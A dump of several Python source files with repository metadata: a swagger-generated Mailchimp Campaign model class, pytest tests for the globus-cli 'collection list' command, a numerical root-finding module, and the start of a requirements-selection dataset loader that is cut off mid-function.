def parent_campaign_id(self, parent_campaign_id):
"""Sets the parent_campaign_id of this Campaign.
If this campaign is the child of another campaign, this identifies the parent campaign. For Example, for RSS or Automation children. # noqa: E501
:param parent_campaign_id: The parent_campaign_id of this Campaign. # noqa: E501
:type: str
"""
self._parent_campaign_id = parent_campaign_id
@property
def type(self):
"""Gets the type of this Campaign. # noqa: E501
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:return: The type of this Campaign. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Campaign.
There are four types of [campaigns](https://mailchimp.com/help/getting-started-with-campaigns/) you can create in Mailchimp. A/B Split campaigns have been deprecated and variate campaigns should be used instead. # noqa: E501
:param type: The type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["regular", "plaintext", "absplit", "rss", "variate"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def create_time(self):
"""Gets the create_time of this Campaign. # noqa: E501
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:return: The create_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""Sets the create_time of this Campaign.
The date and time the campaign was created in ISO 8601 format. # noqa: E501
:param create_time: The create_time of this Campaign. # noqa: E501
:type: datetime
"""
self._create_time = create_time
@property
def archive_url(self):
"""Gets the archive_url of this Campaign. # noqa: E501
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:return: The archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._archive_url
@archive_url.setter
def archive_url(self, archive_url):
"""Sets the archive_url of this Campaign.
The link to the campaign's archive version in ISO 8601 format. # noqa: E501
:param archive_url: The archive_url of this Campaign. # noqa: E501
:type: str
"""
self._archive_url = archive_url
@property
def long_archive_url(self):
"""Gets the long_archive_url of this Campaign. # noqa: E501
The original link to the campaign's archive version. # noqa: E501
:return: The long_archive_url of this Campaign. # noqa: E501
:rtype: str
"""
return self._long_archive_url
@long_archive_url.setter
def long_archive_url(self, long_archive_url):
"""Sets the long_archive_url of this Campaign.
The original link to the campaign's archive version. # noqa: E501
:param long_archive_url: The long_archive_url of this Campaign. # noqa: E501
:type: str
"""
self._long_archive_url = long_archive_url
@property
def status(self):
"""Gets the status of this Campaign. # noqa: E501
The current status of the campaign. # noqa: E501
:return: The status of this Campaign. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this Campaign.
The current status of the campaign. # noqa: E501
:param status: The status of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["save", "paused", "schedule", "sending", "sent", "canceled", "canceling", "archived"] # noqa: E501
if status not in allowed_values:
raise ValueError(
"Invalid value for `status` ({0}), must be one of {1}" # noqa: E501
.format(status, allowed_values)
)
self._status = status
@property
def emails_sent(self):
"""Gets the emails_sent of this Campaign. # noqa: E501
The total number of emails sent for this campaign. # noqa: E501
:return: The emails_sent of this Campaign. # noqa: E501
:rtype: int
"""
return self._emails_sent
@emails_sent.setter
def emails_sent(self, emails_sent):
"""Sets the emails_sent of this Campaign.
The total number of emails sent for this campaign. # noqa: E501
:param emails_sent: The emails_sent of this Campaign. # noqa: E501
:type: int
"""
self._emails_sent = emails_sent
@property
def send_time(self):
"""Gets the send_time of this Campaign. # noqa: E501
The date and time a campaign was sent. # noqa: E501
:return: The send_time of this Campaign. # noqa: E501
:rtype: datetime
"""
return self._send_time
@send_time.setter
def send_time(self, send_time):
"""Sets the send_time of this Campaign.
The date and time a campaign was sent. # noqa: E501
:param send_time: The send_time of this Campaign. # noqa: E501
:type: datetime
"""
self._send_time = send_time
@property
def content_type(self):
"""Gets the content_type of this Campaign. # noqa: E501
How the campaign's content is put together. # noqa: E501
:return: The content_type of this Campaign. # noqa: E501
:rtype: str
"""
return self._content_type
@content_type.setter
def content_type(self, content_type):
"""Sets the content_type of this Campaign.
How the campaign's content is put together. # noqa: E501
:param content_type: The content_type of this Campaign. # noqa: E501
:type: str
"""
allowed_values = ["template", "html", "url", "multichannel"] # noqa: E501
if content_type not in allowed_values:
raise ValueError(
"Invalid value for `content_type` ({0}), must be one of {1}" # noqa: E501
.format(content_type, allowed_values)
)
self._content_type = content_type
@property
def needs_block_refresh(self):
"""Gets the needs_block_refresh of this Campaign. # noqa: E501
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:return: The needs_block_refresh of this Campaign. # noqa: E501
:rtype: bool
"""
return self._needs_block_refresh
@needs_block_refresh.setter
def needs_block_refresh(self, needs_block_refresh):
"""Sets the needs_block_refresh of this Campaign.
Determines if the campaign needs its blocks refreshed by opening the web-based campaign editor. Deprecated and will always return false. # noqa: E501
:param needs_block_refresh: The needs_block_refresh of this Campaign. # noqa: E501
:type: bool
"""
self._needs_block_refresh = needs_block_refresh
@property
def resendable(self):
"""Gets the resendable of this Campaign. # noqa: E501
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:return: The resendable of this Campaign. # noqa: E501
:rtype: bool
"""
return self._resendable
@resendable.setter
def resendable(self, resendable):
"""Sets the resendable of this Campaign.
Determines if the campaign qualifies to be resent to non-openers. # noqa: E501
:param resendable: The resendable of this Campaign. # noqa: E501
:type: bool
"""
self._resendable = resendable
@property
def recipients(self):
"""Gets the recipients of this Campaign. # noqa: E501
:return: The recipients of this Campaign. # noqa: E501
:rtype: List3
"""
return self._recipients
@recipients.setter
def recipients(self, recipients):
"""Sets the recipients of this Campaign.
:param recipients: The recipients of this Campaign. # noqa: E501
:type: List3
"""
self._recipients = recipients
@property
def settings(self):
"""Gets the settings of this Campaign. # noqa: E501
:return: The settings of this Campaign. # noqa: E501
:rtype: CampaignSettings2
"""
return self._settings
@settings.setter
def settings(self, settings):
"""Sets the settings of this Campaign.
:param settings: The settings of this Campaign. # noqa: E501
:type: CampaignSettings2
"""
self._settings = settings
@property
def variate_settings(self):
"""Gets the variate_settings of this Campaign. # noqa: E501
:return: The variate_settings of this Campaign. # noqa: E501
:rtype: ABTestOptions
"""
return self._variate_settings
@variate_settings.setter
def variate_settings(self, variate_settings):
"""Sets the variate_settings of this Campaign.
:param variate_settings: The variate_settings of this Campaign. # noqa: E501
:type: ABTestOptions
"""
self._variate_settings = variate_settings
@property
def tracking(self):
"""Gets the tracking of this Campaign. # noqa: E501
:return: The tracking of this Campaign. # noqa: E501
:rtype: CampaignTrackingOptions1
"""
return self._tracking
@tracking.setter
def tracking(self, tracking):
"""Sets the tracking of this Campaign.
:param tracking: The tracking of this Campaign. # noqa: E501
:type: CampaignTrackingOptions1
"""
self._tracking = tracking
@property
def rss_opts(self):
"""Gets the rss_opts of this Campaign. # noqa: E501
:return: The rss_opts of this Campaign. # noqa: E501
:rtype: RSSOptions
"""
return self._rss_opts
@rss_opts.setter
def rss_opts(self, rss_opts):
"""Sets the rss_opts of this Campaign.
:param rss_opts: The rss_opts of this Campaign. # noqa: E501
:type: RSSOptions
"""
self._rss_opts = rss_opts
@property
def ab_split_opts(self):
"""Gets the ab_split_opts of this Campaign. # noqa: E501
:return: The ab_split_opts of this Campaign. # noqa: E501
:rtype: ABTestingOptions
"""
return self._ab_split_opts
@ab_split_opts.setter
def ab_split_opts(self, ab_split_opts):
"""Sets the ab_split_opts of this Campaign.
:param ab_split_opts: The ab_split_opts of this Campaign. # noqa: E501
:type: ABTestingOptions
"""
self._ab_split_opts = ab_split_opts
@property
def social_card(self):
"""Gets the social_card of this Campaign. # noqa: E501
:return: The social_card of this Campaign. # noqa: E501
:rtype: CampaignSocialCard
"""
return self._social_card
@social_card.setter
def social_card(self, social_card):
"""Sets the social_card of this Campaign.
:param social_card: The social_card of this Campaign. # noqa: E501
:type: CampaignSocialCard
"""
self._social_card = social_card
@property
def report_summary(self):
"""Gets the report_summary of this Campaign. # noqa: E501
:return: The report_summary of this Campaign. # noqa: E501
:rtype: CampaignReportSummary2
"""
return self._report_summary
@report_summary.setter
def report_summary(self, report_summary):
"""Sets the report_summary of this Campaign.
:param report_summary: The report_summary of this Campaign. # noqa: E501
:type: CampaignReportSummary2
"""
self._report_summary = report_summary
@property
def delivery_status(self):
"""Gets the delivery_status of this Campaign. # noqa: E501
:return: The delivery_status of this Campaign. # noqa: E501
:rtype: CampaignDeliveryStatus
"""
return self._delivery_status
@delivery_status.setter
def delivery_status(self, delivery_status):
"""Sets the delivery_status of this Campaign.
:param delivery_status: The delivery_status of this Campaign. # noqa: E501
:type: CampaignDeliveryStatus
"""
self._delivery_status = delivery_status
@property
def links(self):
"""Gets the links of this Campaign. # noqa: E501
A list of link types and descriptions for the API schema documents. # noqa: E501
:return: The links of this Campaign. # noqa: E501
:rtype: list[ResourceLink]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this Campaign.
A list of link types and descriptions for the API schema documents. # noqa: E501
:param links: The links of this Campaign. # noqa: E501
:type: list[ResourceLink]
"""
self._links = links
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Walk every declared attribute and serialize it, recursing into
        # nested swagger models (anything exposing a to_dict method).
        for attr, _ in six.iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Serialize each list element that is itself a model.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Serialize each dict value that is itself a model.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        # If the generated model subclasses dict, include its own items too.
        if issubclass(Campaign, dict):
            for key, value in self.items():
                result[key] = value
        return result
def to_str(self):
    """Return the ``pprint``-formatted string form of the model."""
    model_dict = self.to_dict()
    return pprint.pformat(model_dict)
def __repr__(self):
    """Delegate ``repr()`` (used by `print` and `pprint`) to ``to_str``."""
    return self.to_str()
def __eq__(self, other):
    """Returns true if both objects are equal (same type, same state)."""
    return isinstance(other, Campaign) and self.__dict__ == other.__dict__
def __ne__(self, other):
    """Returns true if both objects are not equal."""
    equal = self == other
    return not equal
| 31.013624
| 441
| 0.61158
|
# coding: utf-8
"""
Mailchimp Marketing API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 3.0.74
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
def _plain_property(attr):
    """Build a pass-through property backed by the private slot ``_<attr>``."""
    def _get(self):
        return getattr(self, "_" + attr)

    def _set(self, value):
        setattr(self, "_" + attr, value)

    return property(_get, _set, doc="The %s of this Campaign." % attr)


def _enum_property(attr, allowed_values):
    """Build a property whose setter validates against a closed value set."""
    def _get(self):
        return getattr(self, "_" + attr)

    def _set(self, value):
        if value not in allowed_values:
            raise ValueError(
                "Invalid value for `{0}` ({1}), must be one of {2}"  # noqa: E501
                .format(attr, value, allowed_values)
            )
        setattr(self, "_" + attr, value)

    return property(_get, _set, doc="The %s of this Campaign." % attr)


class Campaign(object):
    """Campaign model from the Mailchimp Marketing swagger spec.

    NOTE: originally auto-generated by swagger-codegen. The hand-written
    per-attribute getter/setter pairs have been collapsed into generated
    properties (`_plain_property` / `_enum_property`), removing several
    hundred lines of duplication while keeping the exact same public
    attribute interface and enum validation behavior.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the API schema.
    """
    swagger_types = {
        'id': 'str',
        'web_id': 'int',
        'parent_campaign_id': 'str',
        'type': 'str',
        'create_time': 'datetime',
        'archive_url': 'str',
        'long_archive_url': 'str',
        'status': 'str',
        'emails_sent': 'int',
        'send_time': 'datetime',
        'content_type': 'str',
        'needs_block_refresh': 'bool',
        'resendable': 'bool',
        'recipients': 'List3',
        'settings': 'CampaignSettings2',
        'variate_settings': 'ABTestOptions',
        'tracking': 'CampaignTrackingOptions1',
        'rss_opts': 'RSSOptions',
        'ab_split_opts': 'ABTestingOptions',
        'social_card': 'CampaignSocialCard',
        'report_summary': 'CampaignReportSummary2',
        'delivery_status': 'CampaignDeliveryStatus',
        'links': 'list[ResourceLink]'
    }
    attribute_map = {
        'id': 'id',
        'web_id': 'web_id',
        'parent_campaign_id': 'parent_campaign_id',
        'type': 'type',
        'create_time': 'create_time',
        'archive_url': 'archive_url',
        'long_archive_url': 'long_archive_url',
        'status': 'status',
        'emails_sent': 'emails_sent',
        'send_time': 'send_time',
        'content_type': 'content_type',
        'needs_block_refresh': 'needs_block_refresh',
        'resendable': 'resendable',
        'recipients': 'recipients',
        'settings': 'settings',
        'variate_settings': 'variate_settings',
        'tracking': 'tracking',
        'rss_opts': 'rss_opts',
        'ab_split_opts': 'ab_split_opts',
        'social_card': 'social_card',
        'report_summary': 'report_summary',
        'delivery_status': 'delivery_status',
        'links': '_links'
    }

    # Simple pass-through attributes (no validation in the generated code).
    id = _plain_property('id')
    web_id = _plain_property('web_id')
    parent_campaign_id = _plain_property('parent_campaign_id')
    create_time = _plain_property('create_time')
    archive_url = _plain_property('archive_url')
    long_archive_url = _plain_property('long_archive_url')
    emails_sent = _plain_property('emails_sent')
    send_time = _plain_property('send_time')
    needs_block_refresh = _plain_property('needs_block_refresh')
    resendable = _plain_property('resendable')
    recipients = _plain_property('recipients')
    settings = _plain_property('settings')
    variate_settings = _plain_property('variate_settings')
    tracking = _plain_property('tracking')
    rss_opts = _plain_property('rss_opts')
    ab_split_opts = _plain_property('ab_split_opts')
    social_card = _plain_property('social_card')
    report_summary = _plain_property('report_summary')
    delivery_status = _plain_property('delivery_status')
    links = _plain_property('links')

    # Attributes restricted to a closed set of values (swagger enums);
    # assigning anything else raises ValueError, as in the generated code.
    type = _enum_property('type', ["regular", "plaintext", "absplit", "rss", "variate"])
    status = _enum_property('status', ["save", "paused", "schedule", "sending", "sent", "canceled", "canceling", "archived"])
    content_type = _enum_property('content_type', ["template", "html", "url", "multichannel"])

    def __init__(self, id=None, web_id=None, parent_campaign_id=None, type=None, create_time=None, archive_url=None, long_archive_url=None, status=None, emails_sent=None, send_time=None, content_type=None, needs_block_refresh=None, resendable=None, recipients=None, settings=None, variate_settings=None, tracking=None, rss_opts=None, ab_split_opts=None, social_card=None, report_summary=None, delivery_status=None, links=None):  # noqa: E501
        """Campaign - a model defined in Swagger"""  # noqa: E501
        supplied = dict(locals())  # snapshot constructor arguments by name
        self.discriminator = None
        # Initialize every private slot to None, then assign the non-None
        # arguments through the public properties so enum validation runs,
        # in the same declaration order as the generated constructor.
        for attr in self.swagger_types:
            setattr(self, '_' + attr, None)
        for attr in self.swagger_types:
            value = supplied[attr]
            if value is not None:
                setattr(self, attr, value)

    def to_dict(self):
        """Returns the model properties as a dict.

        Nested models (anything exposing ``to_dict``) and containers of
        models are converted recursively into plain Python structures.
        """
        result = {}
        # Iterating the dict directly yields keys; the six.iteritems()
        # py2/py3 shim from the template is unnecessary.
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: item.to_dict() if hasattr(item, "to_dict") else item
                    for key, item in value.items()
                }
            else:
                result[attr] = value
        if issubclass(Campaign, dict):
            # Kept for fidelity with the generated template; Campaign does
            # not subclass dict, so this branch never runs.
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return isinstance(other, Campaign) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 0
| 0
| 0
|
ccc90d9c929391cae107a2a233df254df0e9c438
| 2,937
|
py
|
Python
|
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | 1
|
2016-04-09T17:26:05.000Z
|
2016-04-11T16:13:50.000Z
|
tests/functional/collection/test_collection_list.py
|
globusonline/globus-cli
|
696857baafac198141edc3c1c29c72215f217df1
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import responses
from globus_sdk._testing import load_response_set
@pytest.mark.parametrize(
"filter_val",
[
"mapped_collections",
"mapped-collections",
"MaPpeD-cOLlectiOns",
"guest-collections",
"guest_Collections",
["Mapped-Collections", "Managed_by-me"],
["mapped-collections", "managed-by_me", "created-by-me"],
],
)
| 39.16
| 88
| 0.709227
|
import pytest
import responses
from globus_sdk._testing import load_response_set
def test_collection_list(run_line, add_gcs_login):
    """Happy path: listing collections on a GCSv5 endpoint prints each
    collection's display name.

    ``run_line`` / ``add_gcs_login`` are pytest fixtures supplied by the CLI
    test suite; HTTP responses are canned via ``globus_sdk._testing``.
    """
    meta = load_response_set("cli.collection_operations").metadata
    epid = meta["endpoint_id"]
    add_gcs_login(epid)  # register a GCS login token for the endpoint
    result = run_line(f"globus collection list {epid}")
    collection_names = ["Happy Fun Collection Name 1", "Happy Fun Collection Name 2"]
    for name in collection_names:
        assert name in result.stdout
def test_collection_list_opts(run_line, add_gcs_login):
    """CLI options are translated into the expected GCS API query params.

    Inspects the most recent mocked HTTP call (``responses.calls[-1]``)
    after each invocation.
    """
    meta = load_response_set("cli.collection_operations").metadata
    epid = meta["endpoint_id"]
    add_gcs_login(epid)
    cid = meta["mapped_collection_id"]
    run_line(f"globus collection list --mapped-collection-id {cid} {epid}")
    assert responses.calls[-1].request.params["mapped_collection_id"] == cid
    run_line(f"globus collection list --include-private-policies {epid}")
    assert responses.calls[-1].request.params["include"] == "private_policies"
def test_collection_list_on_gcp(run_line):
    """`collection list` on a Globus Connect Personal endpoint fails with
    exit code 3 and an explanatory type-mismatch message.
    """
    meta = load_response_set("cli.collection_operations").metadata
    epid = meta["gcp_endpoint_id"]
    result = run_line(f"globus collection list {epid}", assert_exit_code=3)
    assert "success" not in result.output
    assert (
        f"Expected {epid} to be a Globus Connect Server v5 Endpoint.\n"
        "Instead, found it was of type 'Globus Connect Personal'."
    ) in result.stderr
    assert "This operation is not supported on objects of this type." in result.stderr
def test_collection_list_on_mapped_collection(run_line):
    """`collection list` aimed at a mapped collection (not an endpoint)
    fails with exit code 3 and the type-mismatch message.
    """
    meta = load_response_set("cli.collection_operations").metadata
    epid = meta["mapped_collection_id"]
    result = run_line(f"globus collection list {epid}", assert_exit_code=3)
    assert "success" not in result.output
    assert (
        f"Expected {epid} to be a Globus Connect Server v5 Endpoint.\n"
        "Instead, found it was of type 'Mapped Collection'."
    ) in result.stderr
    assert "This operation is not supported on objects of this type." in result.stderr
@pytest.mark.parametrize(
    "filter_val",
    [
        "mapped_collections",
        "mapped-collections",
        "MaPpeD-cOLlectiOns",
        "guest-collections",
        "guest_Collections",
        ["Mapped-Collections", "Managed_by-me"],
        ["mapped-collections", "managed-by_me", "created-by-me"],
    ],
)
def test_collection_list_filters(run_line, add_gcs_login, filter_val):
    """Filter names are accepted case-insensitively with `-` or `_` and
    forwarded to the API as a comma-joined, normalized `filter` param.
    """
    meta = load_response_set("cli.collection_operations").metadata
    epid = meta["endpoint_id"]
    add_gcs_login(epid)
    filter_vals = filter_val if isinstance(filter_val, list) else [filter_val]
    filter_str = " ".join(f"--filter {f}" for f in filter_vals)
    run_line(f"globus collection list {filter_str} {epid}")
    filter_params = {v.lower().replace("-", "_") for v in filter_vals}
    assert set(responses.calls[-1].request.params["filter"].split(",")) == filter_params
| 2,414
| 0
| 114
|
93b134cbc992e9743aaef355e11e242ce5dafd4f
| 4,389
|
py
|
Python
|
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | null | null | null |
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | null | null | null |
bicks/mathtool.py
|
balabalabalalaba/testb
|
fd2a8262bba94c561be49d69120401f0d7259fdf
|
[
"MIT"
] | 3
|
2021-07-28T09:51:58.000Z
|
2021-07-30T16:37:26.000Z
|
import numpy as np
def dichotomy(f, a, b, epsilon=1.0e-5):
    """Traditional bisection: return a root of ``f`` inside [a, b].

    Assumes f(a) and f(b) bracket a root (opposite signs); returns the
    midpoint of the final interval once its width is <= ``epsilon``.
    """
    left, right = a, b
    f_left = f(left)
    while True:
        mid = (left + right) / 2.0
        if right - left <= epsilon:
            return mid
        f_mid = f(mid)
        if f_mid * f_left < 0:
            right = mid
        else:
            left, f_left = mid, f_mid
def find_n_roots(f, n, deltax, eps=1.0e-10):
    """Scan rightward from ~0 in steps of ``deltax`` and bisect the first
    ``n`` sign changes of ``f`` into roots.

    Warning! Don't make the deltax = 0.1
    """
    roots = []
    x = 1.0e-5
    prev = f(x)
    while len(roots) < n:
        cur = f(x)
        if prev * cur < 0:
            roots.append(dichotomy(f, x - deltax, x, epsilon=eps))
        prev = cur
        x = x + deltax
    return roots
| 25.369942
| 92
| 0.437229
|
import numpy as np
def dichotomy(f, a, b, epsilon=1.0e-5):
    """Traditional bisection: return a root of ``f`` inside [a, b].

    Assumes f(a) and f(b) bracket a root (opposite signs); returns the
    midpoint of the final interval once its width is <= ``epsilon``.
    """
    left, right = a, b
    f_left = f(left)
    while True:
        mid = (left + right) / 2.0
        if right - left <= epsilon:
            return mid
        f_mid = f(mid)
        if f_mid * f_left < 0:
            right = mid
        else:
            left, f_left = mid, f_mid
def find_n_roots(f, n, deltax, eps=1.0e-10):
    """Scan rightward from ~0 in steps of ``deltax`` and bisect the first
    ``n`` sign changes of ``f`` into roots.

    Warning! Don't make the deltax = 0.1
    """
    roots = []
    x = 1.0e-5
    prev = f(x)
    while len(roots) < n:
        cur = f(x)
        if prev * cur < 0:
            roots.append(dichotomy(f, x - deltax, x, epsilon=eps))
        prev = cur
        x = x + deltax
    return roots
def find_real_roots(f, endkz, startkz=0, deltakz=0.12, eps=1.0e-10):
    """Bisect every sign change of ``f`` sampled on [startkz, endkz) in
    steps of ``deltakz`` and return the resulting roots."""
    roots = []
    kz = startkz
    prev = f(kz)
    while kz < endkz:
        cur = f(kz)
        if prev * cur < 0:
            roots.append(dichotomy(f, kz - deltakz, kz, epsilon=eps))
        prev = cur
        kz = kz + deltakz
    return roots
def find_proj_roots(f, endk0, startk0=0.121, deltak0=0.12, eps=1.0e-10):
    """Bisect every sign change of ``f`` sampled on [startk0, endk0) in
    steps of ``deltak0`` and return the resulting roots."""
    roots = []
    k0 = startk0
    prev = f(k0)
    while k0 < endk0:
        cur = f(k0)
        if prev * cur < 0:
            roots.append(dichotomy(f, k0 - deltak0, k0, epsilon=eps))
        prev = cur
        k0 = k0 + deltak0
    return roots
def golden_section(f, a, b, epsilon=1.0e-10):
c = a + 0.382 * (b - a)
d = a + 0.618 * (b - a)
while (b - a) > epsilon:
if (abs(f(c))) < (abs(f(d))):
a = c
c = d
d = a + 0.618 * (b - a)
else:
b = d
d = c
c = a + 0.382 * (b - a)
return (b + a) / 2
def find_n_roots_for_small_and_big_q(f, qa, n, gox=0, deltax=0.024, eps=1.0e-10, peak1 = 0):
    """Collect the first ``n`` roots of ``f`` by walking between extrema of
    ``f(x) - cos(qa)`` and bisecting consecutive extremum pairs.

    Relies on the module-level helpers ``minus_cosqa``, ``golden_section``
    and ``dichotomy``.
    """
    currentroot = 0
    root = []
    # nf(x) = f(x) - cos(qa); regions where |nf| > 0.9 flank an extremum
    @minus_cosqa(np.cos(qa))
    def nf(x):
        return f(x)
    while currentroot < n:
        if abs(nf(gox)) > 0.9:
            # [a, b] spans one |nf| > 0.9 region; locate the extremum inside
            a = gox
            while abs(nf(gox)) > 0.9:
                gox = gox + deltax
            b = gox
            peak2 = golden_section(nf, a, b, epsilon=eps)
            # a sign change of f between consecutive peaks brackets a root
            if(f(peak1) * f(peak2)) <= eps:
                mayberoot = dichotomy(f, peak1, peak2, epsilon=eps)
                # keep only genuine roots (|f| within tolerance)
                if abs(f(mayberoot)) <= eps:
                    root.append(mayberoot)
                    currentroot = currentroot + 1
            peak1 = peak2
        gox = gox + deltax
    return root
def find_real_roots_for_small_and_big_q(f, qa, deltax=0.024, eps=1.0e-10):
    """Collect roots of ``f`` between consecutive extrema of
    ``f(x) - cos(qa)``, terminating when ``|nf|`` diverges past 1e3.

    Relies on the module-level helpers ``minus_cosqa``, ``golden_section``
    and ``dichotomy``.
    """
    root = []
    gox = 0
    peak1 = 0
    # nf(x) = f(x) - cos(qa); regions where |nf| > 0.9 flank an extremum
    @minus_cosqa(np.cos(qa))
    def nf(x):
        return f(x)
    absnf = abs(nf(gox))
    while True:
        if absnf > 0.9:
            a = gox
            while absnf > 0.9:
                gox = gox + deltax
                absnf = abs(nf(gox))
                # divergence past 1e3 is treated as the end of the scan:
                # check for one last bracketed root, then stop
                if absnf > 1.0e3:
                    peak2 = gox
                    if(f(peak1) * f(peak2)) <= 1.0e-8:
                        root.append(dichotomy(f, peak1, peak2, epsilon=eps))
                    return root
            b = gox
            peak2 = golden_section(nf, a, b, epsilon=eps)
            # sign change of f between consecutive peaks brackets a root
            if(f(peak1) * f(peak2)) <= 1.0e-8:
                mayberoot = dichotomy(f, peak1, peak2, epsilon=eps)
                root.append(mayberoot)
            peak1 = peak2
        gox = gox + deltax
        absnf = abs(nf(gox))
def minus_cosqa(x):
    """Decorator factory that subtracts the constant ``x`` from whatever
    the wrapped function returns."""
    def decorator(func):
        def shifted(*args, **kwargs):
            return func(*args, **kwargs) - x
        return shifted
    return decorator
def find_all_peaks(f, x_start, x_end, deltax=0.01, eps=1.0e-3, lastdata=None):
    """Scan [x_start, x_end) in steps of ``deltax`` and return the
    locations where ``f`` peaks with height ~1 (0.99 < f(peak) < 1.01).

    Each region where ``f > 0.8`` is bracketed and its extremum located
    with the module-level ``golden_section`` helper.

    ``lastdata`` previously defaulted to a shared mutable ``[]``; it now
    defaults to ``None`` (same observable behavior, no shared state).
    """
    lastdata = [] if lastdata is None else lastdata
    x = x_start
    peaks = []
    if len(lastdata):
        # NOTE(review): 'a' is always reassigned before use below; this
        # guard appears vestigial — confirm before removing.
        a = 1
    while x < x_end:
        if f(x) > 0.8:
            a = x
            while f(x) > 0.8:
                x = x + deltax
                if x >= x_end:
                    break
            b = x
            peak = golden_section(f, a, b, epsilon=eps)
            fp = f(peak)
            if 0.99 < fp < 1.01:
                peaks.append(peak)
        x = x + deltax
    return peaks
def secant(f, a, b, eps=1.0e-5):
    """Find a root of ``f`` with the secant method starting from (a, b).

    Iterates ``c = b - f(b) * (b - a) / (f(b) - f(a))`` until successive
    iterates are closer than ``eps``, then returns the last ``c``.
    Raises ZeroDivisionError if the secant becomes horizontal
    (``f(a) == f(b)``).
    """
    fa = f(a)
    fb = f(b)
    c = b - ((b - a) / (fb - fa)) * fb
    while True:
        if abs(b - a) < eps:
            return c
        # reuse the cached fb — the original re-evaluated f(b) here,
        # doubling the function-call count per iteration for no effect
        c = b - ((b - a) / (fb - fa)) * fb
        a = b
        b = c
        fa = fb
        fb = f(b)
| 3,446
| 0
| 184
|
48736beda7d4c0758982c5077f882eea08929d77
| 5,342
|
py
|
Python
|
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
datasets/Dataset.py
|
UCLM-SIMD/MONRP
|
16b19ace0746365300b5d3d16f5dda8c3a196cf7
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from typing import Dict
import numpy as np
import json
import uuid
class Dataset:
    """
    Class used to load datasets as published in
    del Sagrado, José del Águila, Isabel M. Orellana, Francisco J.
    Multi-objective ant colony optimization for requirements selection.
    Empirical Software Engineering. Vol. 20(3). 2015.
    """
    def __init__(self, dataset: str = "test", source_file: str = None, source_dict: Dict = None):
        """Loads dataset vectors depending on the dataset name.
        """
        # Three mutually exclusive sources: an explicit JSON file, an
        # in-memory dict, or a named dataset under datasets/<name>.json.
        # NOTE(review): load_from_dict/aux_dependencies are defined on this
        # class elsewhere in the full source file.
        if source_file:
            with open(source_file) as json_file:
                # use filename as dataset id
                self.id = Path(source_file).stem
                json_data = json.load(json_file)
                self.load_from_dict(json_data)
        elif source_dict:
            # anonymous dict source: generate a random id
            self.id = uuid.uuid4().hex
            self.load_from_dict(source_dict)
        else:  # if not source file->search dataset json in datasets folder
            self.id = dataset
            with open("datasets/"+dataset+".json") as json_file:
                json_data = json.load(json_file)
                self.load_from_dict(json_data)
        # normalize values calculating scaled satisfactions, costs and scores
        self.normalize()
        # simplify dependencies:
        if self.dependencies is not None:
            self.list_of_sons = self.dependencies.copy()  # needed in feda_algorithm.py
            self.calculate_dependencies()

    def calculate_dependencies(self) -> None:
        """Given the list of dependencies, recursively stores dependencies of requirements,
        saving in each requirements index all the requirements that have to be included to satisfy the dependency restrictions.
        """
        self.new_dependencies = {}
        # dependency = index_dependency+1 (starts from 1)
        for dep in range(len(self.dependencies)):
            if self.dependencies[dep] is not None:
                # if req has dependencies -> add them and launch aux fun
                for dep2 in self.dependencies[dep]:
